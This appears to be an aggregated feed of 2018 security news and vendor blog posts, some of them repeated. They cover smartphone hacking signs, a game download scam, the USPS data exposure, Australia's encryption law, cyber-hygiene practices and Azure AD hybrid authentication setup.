The post An integrated approach helps companies improve operational resilience appeared first on Help Net Security.

McAfee Blogs: How To Tell If Your Smartphone Has Been Hacked

Your home screen is just a matrix of numbers. Your device loses its charge quickly, or restarts suddenly. Or, you notice outgoing calls that you never dialed. Chances are your smartphone has been hacked. The sad truth is that hackers now have a multitude of ways to get into your phone, without ever touching it.

Given that our smartphones have become our new wallets, containing a treasure trove of personal and financial information, a breach can leave you at serious risk.

The intruder could log in to your accounts as you, spam your contacts with phishing attacks, or rack up expensive long-distance charges. They could also access any passwords saved on your phone, potentially opening the door to sensitive financial accounts. That’s why it’s important to be able to recognize when your smartphone has been hacked, especially since some of the signs can be subtle.

Here are some helpful clues:

Performance Differences

Is your device operating slower, are web pages and apps harder to load, or does your battery never seem to keep a charge? What about your data plan? Are you exceeding your normal limits? These are all signs that you have malware running in the background, zapping your phone’s resources.

You may have downloaded a bad app, or clicked on a dangerous link in a text message. And malware, like Bitcoin miners, can strain computing power, sometimes causing the phone to heat up, even when you aren’t using it.

Mystery Apps or Data

If you find apps you haven’t downloaded, or calls, texts, and emails that you didn’t send, a hacker is probably in your system. They may be using your device to send premium rate calls or messages, or to spread malware to your contacts.

Pop-ups or Strange Screen Savers

Malware can also be behind spammy pop-ups, changes to your home screen, or bookmarks to suspicious websites. In fact, if you see any configuration changes you didn’t personally make, this is another big clue that your smartphone has been hacked.

What To Do

If any of these scenarios sound familiar, it’s time to take action. Start by deleting any apps or games you didn’t download, erasing risky messages, and running mobile security software, if you have it. Warn your contacts that your phone has been compromised, and to ignore any suspicious links or messages coming from you.

If the problem still doesn’t go away, consider restoring your phone to its original settings. Search online for instructions for your particular phone and operating system to learn how.

Now, let’s look at how to avoid getting hacked in the first place.

Secure Smartphone Tips

1. Use mobile security software—These days your smartphone is just as data rich as your computer. Make sure to protect your critical information, and your privacy, by using comprehensive mobile security software that not only protects you from online threats, but offers anti-theft and privacy protection.

2. Lock your device & don’t store passwords—Make sure that you are using a passcode or facial ID to lock your device when you’re not using it. This way, if you lose your phone it will be more difficult for a stranger to access your information.

Also, remember not to save password or login information for banking apps and other sensitive accounts. You don’t want a hacker to be able to automatically login as you if they do gain access to your device.

3. Avoid using public Wi-Fi—Free Wi-Fi networks, like those offered in hotels and airports, are often unsecured. This makes it easy for a hacker to potentially see the information you are sending over the network. Also, be wary of using public charging stations, unless you choose a “charging only” cable that cannot access your data.

 4. Never leave your device unattended in public—While many threats exist online, you still have to be aware of real-world threats, like someone grabbing your device when you’re not looking. Keep your smartphone on you, or within view, while in public.

If you have a “phone visibility” option, turn it off. This setting allows nearby devices to see your phone and exchange data with it.

5. Stay aware—New mobile threats are emerging all the time. Keep up on the latest scams and warning signs, so you know what to look out for.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Tell If Your Smartphone Has Been Hacked appeared first on McAfee Blogs.



McAfee Blogs

How To Tell If Your Smartphone Has Been Hacked

Your home screen is just a matrix of numbers. Your device loses its charge quickly, or restarts suddenly. Or, you notice outgoing calls that you never dialed. Chances are your smartphone has been hacked. The sad truth is that hackers now have a multitude of ways to get into your phone, without ever touching it.

Given that our smartphones have become our new wallets, containing a treasure trove of personal and financial information, a breach can leave you at serious risk.

The intruder could log in to your accounts as you, spam your contacts with phishing attacks, or rack up expensive long-distance charges. They could also access any passwords saved on your phone, potentially opening the door to sensitive financial accounts. That’s why it’s important to be able to recognize when your smartphone has been hacked, especially since some of the signs can be subtle.

Here are some helpful clues:

Performance Differences

Is your device operating slower, are web pages and apps harder to load, or does your battery never seem to keep a charge? What about your data plan? Are you exceeding your normal limits? These are all signs that you have malware running in the background, zapping your phone’s resources.

You may have downloaded a bad app, or clicked on a dangerous link in a text message. And malware, like Bitcoin miners, can strain computing power, sometimes causing the phone to heat up, even when you aren’t using it.

Mystery Apps or Data

If you find apps you haven’t downloaded, or calls, texts, and emails that you didn’t send, a hacker is probably in your system. They may be using your device to send premium rate calls or messages, or to spread malware to your contacts.

Pop-ups or Strange Screen Savers

Malware can also be behind spammy pop-ups, changes to your home screen, or bookmarks to suspicious websites. In fact, if you see any configuration changes you didn’t personally make, this is another big clue that your smartphone has been hacked.

What To Do

If any of these scenarios sound familiar, it’s time to take action. Start by deleting any apps or games you didn’t download, erasing risky messages, and running mobile security software, if you have it. Warn your contacts that your phone has been compromised, and to ignore any suspicious links or messages coming from you.

If the problem still doesn’t go away, consider restoring your phone to its original settings. Search online for instructions for your particular phone and operating system to learn how.

Now, let’s look at how to avoid getting hacked in the first place.

Secure Smartphone Tips

1. Use mobile security software—These days your smartphone is just as data rich as your computer. Make sure to protect your critical information, and your privacy, by using comprehensive mobile security software that not only protects you from online threats, but offers anti-theft and privacy protection.

2. Lock your device & don’t store passwords—Make sure that you are using a passcode or facial ID to lock your device when you’re not using it. This way, if you lose your phone it will be more difficult for a stranger to access your information.

Also, remember not to save password or login information for banking apps and other sensitive accounts. You don’t want a hacker to be able to automatically login as you if they do gain access to your device.

3. Avoid using public Wi-Fi—Free Wi-Fi networks, like those offered in hotels and airports, are often unsecured. This makes it easy for a hacker to potentially see the information you are sending over the network. Also, be wary of using public charging stations, unless you choose a “charging only” cable that cannot access your data.

 4. Never leave your device unattended in public—While many threats exist online, you still have to be aware of real-world threats, like someone grabbing your device when you’re not looking. Keep your smartphone on you, or within view, while in public.

If you have a “phone visibility” option, turn it off. This setting allows nearby devices to see your phone and exchange data with it.

5. Stay aware—New mobile threats are emerging all the time. Keep up on the latest scams and warning signs, so you know what to look out for.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post How To Tell If Your Smartphone Has Been Hacked appeared first on McAfee Blogs.

Supply chain compromise: Adding undetectable hardware Trojans to integrated circuits

Is it possible for attackers to equip integrated circuits with hardware Trojans that will not change the area or power consumption of the IC, making them thus indiscernible through power-based post fabrication analysis? A group of researchers from the National University of Sciences and Technology (Islamabad, Pakistan), the Vienna University of Technology and New York University have proven it is. They have also demonstrated that hardware Trojans (HTs) can be implanted not only by adding … More

The post Supply chain compromise: Adding undetectable hardware Trojans to integrated circuits appeared first on Help Net Security.

Avoid Coal in Your Digital Stocking — Here’s How to Improve Your Security Posture in 2019

As 2018 draws to a close, it’s time to reflect on the strides the cybersecurity industry made over the past year, and how far companies around the world still have to go to improve their security posture. Throughout the year, businesses were plagued by cybersecurity risks and hit with massive data breaches. In the lead-up to the holiday season, security leaders across industries are wishing for a quiet 2019 with no negative data breach headlines.

5 Cybersecurity Missteps That Put Enterprises at Risk in 2018

What lessons did we learn in 2018? And as we look forward, what best practices can we implement to improve defenses in the new year? We asked industry experts where they observe the worst security practices that still leave enterprises exposed to cybersecurity risks, and they offered advice to help companies and users enjoy a merrier, brighter, more secure 2019.

1. Poor Password Policies

Although passwords are far from perfect as a security mechanism, they are still used pervasively in the enterprise and in personal life. Yet password policies are still rife with problems around the globe.

Idan Udi Edry, CEO of Trustifi, said the most foundational — and also most disregarded — cybersecurity practice is maintaining a strong password.

“A unique password should be utilized for every account and not reused,” said Edry. “It is important to update passwords every 30–90 days. Passwords should never include a significant word, such as a pet’s name, or a significant date, such as a birthdate.”

Deploying devices and appliances and then leaving default passwords in place is also still a shockingly common practice. A threat actor with knowledge of a manufacturer or service provider’s default password conventions can do a lot of damage to an organization with factory settings still in place.

Edry advised enterprises to employ two-factor authentication (2FA) to add more security to their access strategy. Douglas Crawford, digital privacy adviser for BestVPN, meanwhile, recommended encouraging employees to use a password manager.

“It is hard to remember strong passwords for every website and service we use, so people simply stop bothering,” said Crawford. “Use of ‘123456’ as a password is still scarily common. And then we use the same password on every website we visit. This [is] particularly irksome, as this entire security nightmare can be easily remedied through use of password manager apps or services, which do the heavy lifting for us.”

2. Misconfigured Cloud Storage

Earlier this year, researchers from Digital Shadows uncovered more than 1.5 billion sensitive files stored in publicly available locations, such as misconfigured websites and unsecured network-attached storage (NAS) drives.

“Unfortunately, many administrators misconfigure [these buckets] rendering the contents publicly-accessible,” wrote Michael Marriott, senior strategy and research analyst with Digital Shadows.

The information uncovered included a treasure trove of personal data, such as payroll, tax return and health care information — all available to prying eyes thanks to overlooked security best practices in cloud storage.

“With the rise of mobility and cloud usage in enterprises, one of the worst security practices is leaving critical cloud services and SaaS applications open to the internet,” said Amit Bareket, co-founder and CEO of Perimeter 81.

It’s time to get proactive to analyze potential exposures in storage and then devise a plan to address cloud data risks to your organization. It’s also important to remember that with any connected service, it is often better not to deploy than to deploy insecurely.

3. Ineffective Cyber Awareness Training

Security begins and ends with your employees — but how much do they know about security? Specifically, how much do they know about the risks they are facing and how their actions could set your business up for a potential incident?

“At this time of the year, it’s critically important to ensure proper employee awareness of the risks related to travel,” said Baan Alsinawi, president and founder of TalaTek, a Washington-based risk management firm. “Using public Wi-Fi at airports or hotels to access corporate data, possible loss of personally-held devices such as an iPad, iPhone or corporate laptop, especially if not encrypted, talking to strangers about work issues or projects over a glass of wine can expose confidential information.”

Of course, a robust awareness program needs to be in place year-round. Data from London-based advisory and solutions company Willis Towers Watson found that employees are the cause of 66 percent of all cyberbreaches, either through negligence or deliberate offense.

Employees should be regularly educated on phishing, social engineering techniques and other attack vectors that could put corporate data at risk. If awareness training isn’t part of your security strategy, 2019 is the time to learn what an effective awareness program looks like and implement one to promote security best practices in your organization.

4. Poor Oversight of Third-Party Cybersecurity Risks

Third-party vendors and partners can be a source of compromise if criminals can access your organization’s sensitive information through their poorly secured systems. If you’re working with third-party vendors and partners, your security is only as good as theirs. If their systems are breached, your data is also at risk.

“Attackers seeking access to hardened company systems can pivot to breaching an integrated third party, establishing a beachhead there and then leveraging the trust implicit in the integration to gain access,” explained Ralph R. Russo, director of applied computing programs and professor of practice of IT management and cybersecurity at Tulane University School of Professional Advancement.

In 2019, evaluate the state of your third-party risk management. Make it a priority to identify gaps that may put you at risk if you are working with less-than-secure vendors. Implement a vigorous vetting process to determine the security level of your trusted partners.

5. Lack of an Incident Response Plan

A formal, regularly tested cybersecurity incident response plan is essential, yet many organizations continue to operate without one. In fact, 77 percent of companies do not have any formal plan.

Without a written and tested incident response plan, you’re unprepared for the worst-case scenario. It is not enough to focus on prevention; it is essential to establish a comprehensive incident response plan that is clear, detailed, flexible, includes multiple stakeholders, and tested and updated regularly.

Improve Your Security Posture in 2019 and Beyond

If your organization engages in any of these poor practices, it may be time to brush up on your basic cyber hygiene best practices. By following the recommendations outlined here, you can confidently resolve to close gaps in risk mitigation and establish more effective strategies to improve your company’s security posture in 2019 and beyond.

The post Avoid Coal in Your Digital Stocking — Here’s How to Improve Your Security Posture in 2019 appeared first on Security Intelligence.

Consumers still put trust in big brands despite breaches

Janrain conducted a survey to better understand how consumers really feel about brands in the wake of so many breaches. The company polled 1,000 UK adults and found that most consumers are still willing to part with their personal information if it can somehow benefit them. While big internet companies like Google and Facebook remain among the least trusted businesses, a large number of respondents put the most faith in pharmaceutical and travel companies including … More

The post Consumers still put trust in big brands despite breaches appeared first on Help Net Security.

5G and cybersecurity

Keeping you safe in an increasingly connected world

If you’ve upgraded your smartphone in the last few years, there’s a very good chance your handset supports 4G mobile networks. 4G, short for ‘fourth generation’, offers super-fast data download speeds allowing you to stream more video, share larger high-resolution pictures and to browse the web more quickly.

But even these speeds are not enough to keep pace with demand. Everything is getting bigger – 4K video file sizes are enormous, and augmented reality animations are bandwidth hungry.

There is a second issue that needs to be addressed too – the sheer number of wireless devices connecting to mobile networks. Smart devices are an increasingly important part of modern life, at home and in the workplace.

We need more bandwidth and faster connectivity to deal with the changing demands on mobile networks. We are already outgrowing the possibilities of 4G networking.

Welcome to 5G networking

The good news is that the fifth generation (5G) of mobile network technologies has been designed and is undergoing testing. Mobile operators across the world are in the advanced stages of planning how these systems will be rolled out to consumers and businesses in the UK and beyond.

The introduction of 5G technologies will allow us to do more than ever before with our devices – but it also highlights a serious challenge. More and more devices are being connected to mobile networks, and each represents a potential security risk.

Smart sensors used in factories allow manufacturers to monitor assembly lines in real time for instance. But if poorly configured, or insufficiently secured, these devices could be used to hack into the company network to steal other data.

Other devices, like self-driving cars are completely reliant on mobile network connections to work properly. These vehicles are permanently connected, uploading and downloading data to the cloud to make split second decisions. If these decisions are interrupted – by hackers breaking through the network security for instance – the car could be involved in an accident, perhaps even killing people in the process.

More security required

With more devices connected to mobile networks, the need for security increases. Every single device needs to be protected against cyberattack, which means that security systems need to be present everywhere.

To cope with the increasing number of devices, security systems will also have to get smarter. Artificial intelligence will become more important, monitoring network activity to identify – and block – suspicious behaviour automatically. This approach is quicker, and more effective, than traditional IT security provisions especially as security software does not necessarily have to be installed directly on each device.

Play your part

Businesses will have to take care of their own smart sensors, but consumers need to get involved. The increased number of devices and network traffic presents a risk to you too – so you must ensure your smartphone is properly protected.

Even if you don’t have a 5G connection, you can take steps to protect yourself now. Download and install a free copy of Panda Security Antivirus for Android today and you’ll be fully prepared to overcome the future challenges of next generation mobile networks.

The post 5G and cybersecurity appeared first on Panda Security Mediacenter.

Not all data collection is evil: Don’t let privacy scandals stall cybersecurity

Facebook continues to be criticized for its data collection practices. The media is hammering Google over how it handles data. JPMorgan Chase & Company was vilified for using Palantir software to allegedly invade the privacy of employees. This past June marked the five-year anniversary of The Guardian’s first story about NSA mass surveillance operations. These incidents and many others have led to an era where the world is more heavily focused on privacy and trust. … More

The post Not all data collection is evil: Don’t let privacy scandals stall cybersecurity appeared first on Help Net Security.

How can businesses get the most out of pentesting?

More than 4.5 billion data records were compromised in the first half of this year. If you still feel like your enterprise is secure after reading that statistic, you’re one of the few. Hackers utilizing high-profile exploits to victimize organizations is becoming an almost daily occurrence, with 18,000 to 19,000 new vulnerabilities estimated to show up in 2018. Here’s the thing though – we can still address the situation and make the current threat landscape … More

The post How can businesses get the most out of pentesting? appeared first on Help Net Security.

Huawei CFO Arrested in Canada

Meng Wangzhou, Chief Financial Officer (CFO) of the world’s second largest Telecom giant Huawei, and the daughter of its Founder

Huawei CFO Arrested in Canada on Latest Hacking News.

Australia Now Has an Encryption Bill, Labor Party Drops Suggestions

On Thursday, the Australian Parliament unanimously passed the most controversial Bill of the year, The Access and Assistance Bill, 2018,

Australia Now Has an Encryption Bill, Labor Party Drops Suggestions on Latest Hacking News.

Australia Passes Anti-Encryption Bill—Here’s Everything You Need To Know

Australia's House of Representatives has finally passed the "Telecommunications Assistance and Access Bill 2018," also known as the Anti-Encryption Bill, on Thursday that would now allow law enforcement to force Google, Facebook, WhatsApp, Signal, and other tech giants to help them access encrypted communications. The Australian government argues the new legislation is important for national

December Patch Tuesday forecast: Let it snow, let it snow, let it snow

Grab your shovels, dust off the snow blower, and bundle up. The way patches are accumulating this month is making me think of winter in Minnesota. I’m talking about the kind where the snow flurries start and stop so many times over the course of a few weeks, you suddenly realize there is a lot of snow out there! So the question is, do you shovel in small amounts when there are breaks in the … More

The post December Patch Tuesday forecast: Let it snow, let it snow, let it snow appeared first on Help Net Security.

Half of management teams lack awareness about BPC despite increased attacks

Trend Micro revealed that 43 percent of surveyed organizations have been impacted by a Business Process Compromise (BPC). Despite a high incidence of these types of attacks, 50 percent of management teams still don’t know what these attacks are or how their business would be impacted if they were victimized. Most popular filename categories used in malicious attachments (based on VirusTotal samples) In a BPC attack, criminals look for loopholes in business processes, vulnerable systems … More

The post Half of management teams lack awareness about BPC despite increased attacks appeared first on Help Net Security.

US Postal Service exposed the details of 60 million people

A few weeks ago the United States Postal Service (USPS) patched up a vulnerability that has been revealing the details of sixty million people, predominantly US residents, over the last year. About a year ago an anonymous cybersecurity researcher tipped off the Post Office about the vulnerability, but USPS failed to address the issue. After a long wait, the cybersecurity expert had no other choice but to inform the media about the problem hoping that public attention would prompt a reaction from the independent agency of the United States government. As soon as the security flaw became public, the Postal Service patched the vulnerability.

The cybersecurity flow affected the personal details of people who have signed up for USPS’ Informed Visibility service. As you might already know, Informed Delivery is a service that provides end-to-end mail tracking information for letter and flat pieces, bundles, handling units, and containers. The API exploit enabled anyone with basic IT knowledge and a username and a password to export information about other users. This includes private information such as usernames, account numbers, physical addresses, email addresses, phone numbers, authorized users and additional information. Currently, there is no evidence confirming that sensitive information such as account passwords, banking details, or social security numbers may have been exposed.

In a statement to the media, Postal Service media representative said that currently, USPS has no information that this security flaw was ever used for criminal purposes but are continuing the investigation. Their goal is to ensure that anyone who might have sought to access their systems inappropriately is pursued to the fullest extent of the law. On a question why USPS took a whole year to deal with the reported issue, USPS spokesperson said they currently do not have evidence that the cybersecurity expert reached out to them in 2017.

USPS has been under fire in the past too; the independent government agency exposed personal details of almost all USPS employees in a hack back in 2014. The hack included workers’ compensation records of nearly 500,000 people and approximately 3 million customer-inquiry records. The current 2018 is not going well either, apart from being constantly dragged in the fight between President Trump and Amazon’s Jeff Bezos, in August the U.S. Postal Service had to apologize to a Democratic congressional candidate and a former CIA operative Abigail Spanberger for accidentally releasing her records to a Republican super PAC.

The post US Postal Service exposed the details of 60 million people appeared first on Panda Security Mediacenter.

Attention Red Dead Redemption 2 Players: Dodge This New Download Scam

Rockstar Games’ Red Dead Redemption 2 has struck a popular chord with many online gamers. Unfortunately, the Western-themed action-adventure game has also become a popular vessel for malicious activity among cybercriminals as well. Scammers are tricking gamers into giving up their personal information with phony “free” downloads of the online game, while simultaneously making a profit on these downloads.

You’re probably wondering how exactly this scam works. It first begins with cybercriminals planting their phony download traps in ads on platforms like YouTube, Twitter, and blog postings. With other, less sophisticated scams, a user would be prompted to install several bundled applications at this point, each one generating revenue for the scammer. But this scheme works a little bit differently. When the user clicks on the “download” button, they are presented with a fake install screen showing the progression of the game’s download process.  The fake install takes about an hour to complete, further giving the illusion that a large file is actually being downloaded on the user’s device.

Once the fake installation is complete, the user is asked to enter a nonexistent license key (a pattern of numbers and/or letters provided to licensed users of a software program). If a user clicks on one of the buttons on this screen, they are redirected to a website asking for human verification in the form of surveys and questionnaires. These surveys trick the user into divulging their personal information for the cybercriminal’s disposal. What’s more, the scammer earns revenue for their malicious acts.

Because this scheme tricks users into handing over their personal information, it affects a victim’s overall privacy. Luckily, there are steps users can take to combat this threat:

  • Browse with caution. Many scammers target gamers through popular websites like YouTube and Twitter to push out malicious content. Use discretion when browsing these websites.
  • Only download content from trusted sources. If you come across a download offer that seems too good to be true, it probably is. Only download software from legitimate sources and avoid sites if you can’t tell whether they are trustworthy or not.
  • Use security software to browse the internet. Sometimes, it can be hard to distinguish whether a site is malicious or not. Security solutions like McAfee WebAdvisor can detect the URLs and scam installers associated with this threat.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention Red Dead Redemption 2 Players: Dodge This New Download Scam appeared first on McAfee Blogs.

CISO series: Strengthen your organizational immune system with cybersecurity hygiene

One of the things I love about my job is the time I get to spend with security professionals, learning firsthand about the challenges of managing security strategy and implementation day to day. There are certain themes that come up over and over in these conversations. My colleague Ken Malcolmson and I discussed a few of them on the inaugural episode of the Microsoft CISO Spotlight Series: CISO Lessons Learned. Specifically, we talked about the challenges CISOs face migrating to the cloud and protecting your organizations data. In this blog, I dig into one of the core concepts we talked about: practicing cybersecurity hygiene.

Hygiene means conditions or practices conducive to maintaining health. Cybersecurity hygiene is about maintaining cyberhealth by developing and implementing a set of tools, policies, and practices to increase your organization’s resiliency in the face of attacks and exploits. Healthy habits like drinking lots of water, walking every day, and eating a rainbow of vegetables build up the immune system, so our bodies can fight off viruses with minimal downtime. Most of the time we dont even realize how powerful the protection of these behaviors are until that day deep in January when you look around your office and realize you are one of the only people who isnt sick. Thats what cybersecurity hygiene does; it strengthens your organizational immune system. Its a simple concept until you start thinking about the last time you resolved to start practicing healthy habits but were skipping the salad by day three because big salads make your stomach bloat and youd rather have a candy bar anyway.

Success starts with strategy

No matter where in the world I am, CSOs and CISOs tell me their days are filled with fire drills and crises that consume attention and resources but dont help advance a strategic agenda. A little like that candy bardrawing focus in the present but diverting energy from long-term goals. In the precious moments of downtime, when cyber executives can turn attention to long-term strategy and proactive security measures, its not uncommon to have those goals diverted in a different waychasing the latest trend that the board is excited about or having to react to failure or a finding from a recent security assessment.

Consistent change changes systems

Our bodies are systemswhen we eat more vegetables our microbiome changes, it becomes easier to digest those veggies and can actually begin craving them. But if you stock the pantry with candy instead of leafy greens, its hard to make a consistent change. For cyberhealth, you need a strategy that works with the strengths of your organization and mitigates its weakness. Its a little like planning to be healthy. If you are social, it can help to enlist a friend in your exercise routine. If you work late, you can buy prepared, healthy food, so you arent as tempted to grab that candy bar after a long day.

To implement good security practices, take some time to understand your budget, your priorities, and your greatest vulnerabilities and allocate your money appropriately. Create strategic cybersecurity targets and goals for the next one, three, and five years and engage the C-Suite and board in the approvals. You will feel more empowered in conversations with the C-Suite when you have a good rationale and a solid plan and when cybersecurity hygiene becomes a systemic part of the organization, the healthy system will start to crave it.

Practice good cybersecurity hygiene

Once you have a strategy, you are ready to institute some best practices. We recommend getting started with the following to all our clients, big and small:

  • Back up data: Make sure you have a regular process to back up your data to a location separate from your production data and encrypt it in transit and at rest.
  • Implement identities: A good identity and access management solution allows you to enable a single common identity across on-premises and cloud resources with added safeguards to protect your most privileged accounts.
  • Deploy conditional access: Use conditional access to control access based on location, device, or other risk factors.
  • Use Multi-Factor Authentication: Multi-Factor Authentication works on its own or in conjunction with conditional access to verify that users trying to access your resources are who they say they are.
  • Patching: A strategy to ensure all of your software and hardware is regularly patched and updated is important to reduce the number of security vulnerabilities that a hacker can exploit.

Develop cybersecurity hygiene with industry security frameworks

Excited to build healthy cyber habits but not sure where to start? The National Institute of Standards and Technology (NIST) Cybersecurity Framework is a great place to start. You can also download blueprints that will help you implement Microsoft Azure according to NIST standards.

The Center for Information Security (CIS) is a non-profit organization that helps organizations protect themselves from cybercrime. Review the CIS Microsoft Azure Foundations benchmark, which provides recommended steps to securely implement Azure.

Stay healthy, eat your cyber vegetables, and stay up to date by watching our Microsoft CISO Spotlight Series: CISO Lessons Learned, and your organization can build the resiliency to take on any threat.

The post CISO series: Strengthen your organizational immune system with cybersecurity hygiene appeared first on Microsoft Secure.

Radware Blog: Growing Your Business: Millennials and M-Commerce

Millennials are the largest generation in the U.S. labor force—a position they’ve held since 2016—and they’re involved in the majority (73%) of B2B purchasing decisions. Raised in the age of the Internet, they’re digital natives and easily adopt and adapt to new technologies. And mobile apps are their lifelines. Why does this matter? Well, when […]

The post Growing Your Business: Millennials and M-Commerce appeared first on Radware Blog.



Radware Blog

An introduction to deception technology

This article is first in a five-part series being developed by Dr. Edward Amoroso in conjunction with the deception technology team from Attivo Networks. The article provides an overview of the evolution of deception, including its use in the enterprise, with emphasis on the practical requirements that have emerged in recent years to counter the growing number and nature of malicious threats. Purpose of deception for cyber The idea of modern deception in cyber security … More

The post An introduction to deception technology appeared first on Help Net Security.

Measuring privacy operations: Use of technology on the rise

Critical privacy program activities such as creating data inventories, conducting data protection impact assessments (DPIA), and managing data subject access rights requests (DSAR) are now well established in large and small organizations in both Europe and the United States, according to TrustArc and the International Association of Privacy Professionals (IAPP). “Among our thousands of members, we know that privacy teams are now reporting on a regular basis to company leadership, and consequently they need to … More

The post Measuring privacy operations: Use of technology on the rise appeared first on Help Net Security.

Consumers believe social media sites pose greatest risk to data

A majority of consumers are willing to walk away from businesses entirely if they suffer a data breach, with retailers most at risk, according to Gemalto. Two-thirds (66%) are unlikely to shop or do business with an organisation that experiences a breach where their financial and sensitive information is stolen. Retailers (62%), banks (59%), and social media sites (58%) are the most at risk of suffering consequences with consumers prepared to use their feet. Surveying … More

The post Consumers believe social media sites pose greatest risk to data appeared first on Help Net Security.

Microsoft Secure: Step 1. Identify users: top 10 actions to secure your environment

This series outlines the most fundamental steps you can take with your investment in Microsoft 365 security solutions. Well provide advice on activities such as setting up identity management through active directory, malware protection, and more. In this post, we explain how to create a single common identity across on-premises and cloud with hybrid authentication.

Establishing a single, common identity for each user is the foundations step to your cybersecurity strategy. If you currently have an on-premises footprint, this means connecting your Azure Active Directory (Azure AD) to your on-premises resources. There are various requirements and circumstances that will influence the hybrid identity and authentication method that you choose, but whether you choose federation or cloud authentication, there are important security implications for each that you should consider. This blog walks you through our recommended security best practices for each hybrid identity method.

Set up password hash synchronization as your primary authentication method when possible

Azure AD Connect allows your users to access on-premises resources including Azure, Office 365, and Azure AD-integrated SaaS apps using one identity. It uses your on-premises Active Directory as the authority, so you can use your own password policy, and Azure AD Connect gives you visibility into the types of apps and identities that are accessing your company resources. If you choose Azure AD Connect, Microsoft recommends that you enable password hash synchronization (Figure 1) as your primary authentication method. Password hash synchronization synchronizes the password hash in your on-premises Active Directory to Azure AD. It authenticates in the cloud with no on-premises dependency, simplifying your deployment process. It also allows you to take advantage of Azure AD Identity Protection, which will alert you if any of the usernames and passwords in your organization have been sold on the dark web.

Figure 1. Password hash sync synchronizes the password hash in your on-premises Active Directory to Azure AD.

Enable password hash synchronization as a backup during on-premises outages

If your authentication requirements are not natively supported by password hash synchronization, another option available through Azure AD Connect is pass-through authentication (Figure 2). Pass-through authentication provides a simple password validation for Azure AD authentication services by using a software agent that runs on one or more on-premises servers. Since pass-through authentication relies on your on-premises infrastructure, your users could lose access to both Active Directory-connected cloud resources and on-premises resources if your on-premises environment goes down. To limit user downtime and loss of productivity, we recommend that you configure password hash synchronization as a backup. This allows your users to sign in and access cloud resources during an on-premises outage. It also gives you access to advanced security features, like Azure Directory Identity Protection.

Figure 2. Pass-through authentication provides a simple password validation for Azure AD authentication services.

Whether you implement password hash synchronization as your primary authentication method or as a backup during on-premises outages, you can use the Active Directory Federation Services (AD FS) to password hash sync deployment plan as a step-by-step guide to walk you through the implementation process.

Implement extranet lockout if you use AD FS

AD FS may be the right choice if your organization requires on-premises authentication or if you are already invested in federation services (Figure 3). Federation services authenticates users and connects to the cloud using an on-premises footprint that may require several servers. To ensure your users and data are as secure as possible, we recommend two additional steps.

First, enable password hash synchronization as a backup authentication method to get access to Azure AD Identity Protection and minimize interruptions if an outage should occur. Second, we recommend you implement extranet lockout. Extranet lockout protects against brute force attacks that target AD FS, while preventing users from being locked out of Active Directory. If you are using AD FS running on Windows Server 2016, set up extranet smart lockout. For AD FS running on Windows Server 2012 R2AD, youll need to turn on extranet lockout protection.

Figure 3. Federation services authenticates users and connects to the cloud using an on-premises footprint.

You can use the AD FS to pass-through authentication deployment plan as a step-by-step guide to walk you through the implementation process.

Learn more

Check back in a few weeks for our next blog post, Step 2. Manage authentication and safeguard access. In this post well dive into additional protections you can apply to your identities to ensure that only authorized people access the appropriate data and apps.

Get deployment help now

FastTrack for Microsoft 365 provides end-to-end guidance to set up your security products. FastTrack is a deployment and adoption service that comes at no charge with your subscription. Get started at FastTrack for Microsoft 365.

Resources

The post Step 1. Identify users: top 10 actions to secure your environment appeared first on Microsoft Secure.



Microsoft Secure

Step 1. Identify users: top 10 actions to secure your environment

This series outlines the most fundamental steps you can take with your investment in Microsoft 365 security solutions. Well provide advice on activities such as setting up identity management through active directory, malware protection, and more. In this post, we explain how to create a single common identity across on-premises and cloud with hybrid authentication.

Establishing a single, common identity for each user is the foundations step to your cybersecurity strategy. If you currently have an on-premises footprint, this means connecting your Azure Active Directory (Azure AD) to your on-premises resources. There are various requirements and circumstances that will influence the hybrid identity and authentication method that you choose, but whether you choose federation or cloud authentication, there are important security implications for each that you should consider. This blog walks you through our recommended security best practices for each hybrid identity method.

Set up password hash synchronization as your primary authentication method when possible

Azure AD Connect allows your users to access on-premises resources including Azure, Office 365, and Azure AD-integrated SaaS apps using one identity. It uses your on-premises Active Directory as the authority, so you can use your own password policy, and Azure AD Connect gives you visibility into the types of apps and identities that are accessing your company resources. If you choose Azure AD Connect, Microsoft recommends that you enable password hash synchronization (Figure 1) as your primary authentication method. Password hash synchronization synchronizes the password hash in your on-premises Active Directory to Azure AD. It authenticates in the cloud with no on-premises dependency, simplifying your deployment process. It also allows you to take advantage of Azure AD Identity Protection, which will alert you if any of the usernames and passwords in your organization have been sold on the dark web.

Figure 1. Password hash sync synchronizes the password hash in your on-premises Active Directory to Azure AD.

Enable password hash synchronization as a backup during on-premises outages

If your authentication requirements are not natively supported by password hash synchronization, another option available through Azure AD Connect is pass-through authentication (Figure 2). Pass-through authentication provides a simple password validation for Azure AD authentication services by using a software agent that runs on one or more on-premises servers. Since pass-through authentication relies on your on-premises infrastructure, your users could lose access to both Active Directory-connected cloud resources and on-premises resources if your on-premises environment goes down. To limit user downtime and loss of productivity, we recommend that you configure password hash synchronization as a backup. This allows your users to sign in and access cloud resources during an on-premises outage. It also gives you access to advanced security features, like Azure Directory Identity Protection.

Figure 2. Pass-through authentication provides a simple password validation for Azure AD authentication services.

Whether you implement password hash synchronization as your primary authentication method or as a backup during on-premises outages, you can use the Active Directory Federation Services (AD FS) to password hash sync deployment plan as a step-by-step guide to walk you through the implementation process.

Implement extranet lockout if you use AD FS

AD FS may be the right choice if your organization requires on-premises authentication or if you are already invested in federation services (Figure 3). Federation services authenticates users and connects to the cloud using an on-premises footprint that may require several servers. To ensure your users and data are as secure as possible, we recommend two additional steps.

First, enable password hash synchronization as a backup authentication method to get access to Azure AD Identity Protection and minimize interruptions if an outage should occur. Second, we recommend you implement extranet lockout. Extranet lockout protects against brute force attacks that target AD FS, while preventing users from being locked out of Active Directory. If you are using AD FS running on Windows Server 2016, set up extranet smart lockout. For AD FS running on Windows Server 2012 R2AD, youll need to turn on extranet lockout protection.

Figure 3. Federation services authenticates users and connects to the cloud using an on-premises footprint.

You can use the AD FS to pass-through authentication deployment plan as a step-by-step guide to walk you through the implementation process.

Learn more

Check back in a few weeks for our next blog post, Step 2. Manage authentication and safeguard access. In this post well dive into additional protections you can apply to your identities to ensure that only authorized people access the appropriate data and apps.

Get deployment help now

